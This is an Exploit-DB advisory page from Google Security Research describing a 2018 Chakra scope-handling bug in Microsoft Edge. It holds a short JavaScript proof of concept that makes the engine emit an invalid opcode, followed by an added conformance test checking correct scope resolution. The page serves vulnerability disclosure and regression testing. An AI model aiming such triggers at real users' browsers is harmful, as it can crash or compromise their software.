Microsoft Edge Chakra – Incorrect Scope Handling

  • Author: Google Security Research
    Date: 2018-01-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/43715/
    // PoC:

    (function func(arg = function () {
        print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
    }()) {
        print(func);
        function func() {

        }
    })();

    // Chakra fails to distinguish whether the function is referenced in the param scope and ends up emitting an invalid opcode.
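
The scope resolution that ECMAScript requires for the PoC's shape, written as a conformance check that could serve as a regression test for an engine. This is an added example, not part of the original advisory or of Chakra's test suite; `probeScopes`, `seen` and `outer` are hypothetical names, and results are returned instead of printed so the check does not depend on a shell's `print`.

```javascript
// Added example: same structure as the PoC (a named function expression
// whose default-parameter initializer references its own name, plus a
// body-level declaration of the same name), instrumented to record
// which binding each scope resolves.
function probeScopes() {
  const seen = {};

  const outer = function func(arg = function () {
    // Param scope: the only bindings here are `arg` and `arguments`,
    // so `func` must resolve to the named function expression itself.
    seen.param = func;
    // Also hand back a closure over the param scope, to be called
    // after the body has run and the inner declaration exists.
    return () => func;
  }()) {
    // Body scope: the hoisted inner declaration shadows the name.
    seen.body = func;
    function func() {}
    return arg;
  };

  const deferred = outer();
  seen.deferred = deferred();

  return {
    paramSeesOuter: seen.param === outer,
    deferredSeesOuter: seen.deferred === outer,
    bodySeesInner: typeof seen.body === 'function' && seen.body !== outer,
  };
}

console.log(probeScopes());
```

All three fields are `true` on a conforming engine; a `false` value means `func` was resolved against the wrong scope.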